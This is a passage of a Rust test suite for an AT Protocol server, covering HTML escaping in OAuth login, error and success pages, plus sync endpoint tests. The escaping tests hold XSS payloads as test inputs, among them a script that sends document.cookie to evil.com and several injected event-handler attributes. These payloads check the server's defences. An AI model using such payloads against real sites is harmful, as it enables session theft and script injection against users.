assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity");
}
#[test]
fn test_oauth_template_xss_escaping_scope() {
let malicious_scope = "\"><script>alert('xss')</script>";
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
}
#[test]
fn test_oauth_template_xss_escaping_error_message() {
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
}
#[test]
fn test_oauth_template_xss_escaping_login_hint() {
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
let html = login_page("client123", None, None, "test-uri", None, Some(malicious_hint));
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
assert!(html.contains("&quot;"), "Quotes should be escaped");
}
#[test]
fn test_oauth_template_xss_escaping_request_uri() {
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
let html = login_page("client123", None, None, malicious_uri, None, None);
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
}
#[test]
fn test_oauth_error_page_xss_escaping() {
let malicious_error = "<script>steal()</script>";
let malicious_desc = "<img src=x onerror=evil()>";
let html = error_page(malicious_error, Some(malicious_desc));
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
}
#[test]
fn test_oauth_success_page_xss_escaping() {
let malicious_name = "<script>steal_session()</script>";
let html = success_page(Some(malicious_name));
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
}
#[test]
fn test_oauth_template_no_javascript_urls() {
let html = login_page("client123", None, None, "test-uri", None, None);
assert!(!html.contains("javascript:"), "Login page should not contain javascript: URLs");
let error_html = error_page("test_error", None);
assert!(!error_html.contains("javascript:"), "Error page should not contain javascript: URLs");
let success_html = success_page(None);
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
}
#[test]
fn test_oauth_template_form_action_safe() {
let malicious_uri = "javascript:alert('xss')//";
let html = login_page("client123", None, None, malicious_uri, None, None);
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
}
#[test]
fn test_send_error_types_have_display() {
let timeout = SendError::Timeout;
let max_retries = SendError::MaxRetriesExceeded("test".to_string());
let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string());
assert!(!format!("{}", timeout).is_empty());
assert!(!format!("{}", max_retries).is_empty());
assert!(!format!("{}", invalid_recipient).is_empty());
}
#[test]
fn test_send_error_timeout_message() {
let error = SendError::Timeout;
let msg = format!("{}", error);
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
}
#[test]
fn test_send_error_max_retries_includes_detail() {
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
let msg = format!("{}", error);
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
}
#[tokio::test]
async fn test_check_signup_queue_accepts_session_jwt() {
use common::{base_url, client, create_account_and_login};
let base = base_url().await;
let http_client = client();
let (token, _did) = create_account_and_login(&http_client).await;
let res = http_client
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
.header("Authorization", format!("Bearer {}", token))
.send()
.await
.unwrap();
assert_eq!(res.status(), reqwest::StatusCode::OK, "Session JWTs should be accepted");
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["activated"], true);
}
#[tokio::test]
async fn test_check_signup_queue_no_auth() {
use common::{base_url, client};
let base = base_url().await;
let http_client = client();
let res = http_client
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
.send()
.await
.unwrap();
assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work");
let body: serde_json::Value = res.json().await.unwrap();
assert_eq!(body["activated"], true);
}
#[test]
fn test_html_escape_ampersand() {
let html = login_page("client&test", None, None, "test-uri", None, None);
assert!(html.contains("&amp;"), "Ampersand should be escaped");
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
}
#[test]
fn test_html_escape_quotes() {
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped");
assert!(html.contains("&#39;") || html.contains("&apos;"), "Single quotes should be escaped");
}
#[test]
fn test_html_escape_angle_brackets() {
let html = login_page("client<test>more", None, None, "test-uri", None, None);
assert!(html.contains("&lt;"), "Less than should be escaped");
assert!(html.contains("&gt;"), "Greater than should be escaped");
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
}
#[test]
fn test_oauth_template_preserves_safe_content() {
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
assert!(html.contains("my-safe-client") || html.contains("My Safe App"), "Safe content should be preserved");
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
assert!(html.contains("user@example.com"), "Login hint should be preserved");
}
#[test]
fn test_csrf_like_input_value_protection() {
let malicious = "\" onclick=\"alert('csrf')";
let html = login_page("client", None, None, malicious, None, None);
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
}
#[test]
fn test_unicode_handling_in_templates() {
let unicode_client = "客户端 クライアント";
let html = login_page(unicode_client, None, None, "test-uri", None, None);
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
}
#[test]
fn test_null_byte_in_input() {
let with_null = "client\0id";
let sanitized = sanitize_header_value(with_null);
assert!(sanitized.contains("client"), "Content before null should be preserved");
}
#[test]
fn test_very_long_input_handling() {
let long_input = "x".repeat(10000);
let sanitized = sanitize_header_value(&long_input);
assert!(!sanitized.is_empty(), "Long input should still produce output");
}

307
tests/sync_deprecated.rs Normal file
View File

@@ -0,0 +1,307 @@
mod common;
mod helpers;
use common::*;
use helpers::*;
use reqwest::StatusCode;
use serde_json::Value;
#[tokio::test]
async fn test_get_head_success() {
let client = client();
let (did, _jwt) = setup_new_user("gethead-success").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert!(body["root"].is_string());
let root = body["root"].as_str().unwrap();
assert!(root.starts_with("bafy"), "Root CID should be a CID");
}
#[tokio::test]
async fn test_get_head_not_found() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", "did:plc:nonexistent12345")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "HeadNotFound");
assert!(body["message"].as_str().unwrap().contains("Could not find root"));
}
#[tokio::test]
async fn test_get_head_missing_param() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_head_empty_did() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", "")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_get_head_whitespace_did() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", " ")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_head_changes_after_record_create() {
let client = client();
let (did, jwt) = setup_new_user("gethead-changes").await;
let res1 = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get initial head");
let body1: Value = res1.json().await.unwrap();
let head1 = body1["root"].as_str().unwrap().to_string();
create_post(&client, &did, &jwt, "Post to change head").await;
let res2 = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get head after record");
let body2: Value = res2.json().await.unwrap();
let head2 = body2["root"].as_str().unwrap().to_string();
assert_ne!(head1, head2, "Head CID should change after record creation");
}
#[tokio::test]
async fn test_get_checkout_success() {
let client = client();
let (did, jwt) = setup_new_user("getcheckout-success").await;
create_post(&client, &did, &jwt, "Post for checkout test").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
assert_eq!(
res.headers()
.get("content-type")
.and_then(|h| h.to_str().ok()),
Some("application/vnd.ipld.car")
);
let body = res.bytes().await.expect("Failed to get body");
assert!(!body.is_empty(), "CAR file should not be empty");
assert!(body.len() > 50, "CAR file should contain actual data");
}
#[tokio::test]
async fn test_get_checkout_not_found() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", "did:plc:nonexistent12345")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::NOT_FOUND);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "RepoNotFound");
}
#[tokio::test]
async fn test_get_checkout_missing_param() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_checkout_empty_did() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", "")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_checkout_empty_repo() {
let client = client();
let (did, _jwt) = setup_new_user("getcheckout-empty").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body = res.bytes().await.expect("Failed to get body");
assert!(!body.is_empty(), "Even empty repo should return CAR header");
}
#[tokio::test]
async fn test_get_checkout_includes_multiple_records() {
let client = client();
let (did, jwt) = setup_new_user("getcheckout-multi").await;
for i in 0..5 {
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
}
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body = res.bytes().await.expect("Failed to get body");
assert!(body.len() > 500, "CAR file with 5 records should be larger");
}
#[tokio::test]
async fn test_get_head_matches_latest_commit() {
let client = client();
let (did, _jwt) = setup_new_user("gethead-matches-latest").await;
let head_res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get head");
let head_body: Value = head_res.json().await.unwrap();
let head_root = head_body["root"].as_str().unwrap();
let latest_res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getLatestCommit",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get latest commit");
let latest_body: Value = latest_res.json().await.unwrap();
let latest_cid = latest_body["cid"].as_str().unwrap();
assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
}
#[tokio::test]
async fn test_get_checkout_car_header_valid() {
let client = client();
let (did, _jwt) = setup_new_user("getcheckout-header").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body = res.bytes().await.expect("Failed to get body");
assert!(body.len() >= 2, "CAR file should have at least header length");
}